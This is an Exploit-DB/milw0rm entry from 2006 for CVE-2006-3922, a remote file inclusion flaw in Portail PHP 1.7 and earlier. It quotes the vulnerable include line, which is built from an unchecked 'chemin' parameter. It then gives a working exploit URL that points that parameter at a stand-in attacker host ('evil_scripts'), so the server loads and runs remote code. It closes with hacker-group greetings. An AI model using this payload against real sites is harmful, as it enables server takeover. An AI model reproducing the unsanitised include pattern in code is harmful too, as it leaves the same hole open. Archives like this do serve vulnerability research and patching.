Portail PHP <= 1.7 chemin Remote Inclusion Vulnerability

2006-07-27T00:00:00
ID EDB-ID:2081
Type exploitdb
Reporter Mehmet Ince
Modified 2006-07-27T00:00:00

Description

Portail PHP <= 1.7 (chemin) Remote Inclusion Vulnerability. CVE-2006-3922. Webapps exploit for php platform

                                        
                                            Portail PHP v1.7 &lt;- (chemin) Remote Inclusion Vulnerability

#Author: xoron

#script: Portail PHP

#Class : Remote

#cont@ct: x0r0n[at]hotmail[dot]com

#CODE:    include ("$chemin/include/config.php")

#Exploit:
http://www.site.com/[path]/mod_membre/inscription.php?chemin=http://evil_scripts?

#Thanx : WWW.CYBER-WARRiOR.ORG

#Greetz: DJR, x-mastER, R3D4C!D and all cyber-warrior users.

# milw0rm.com [2006-07-27]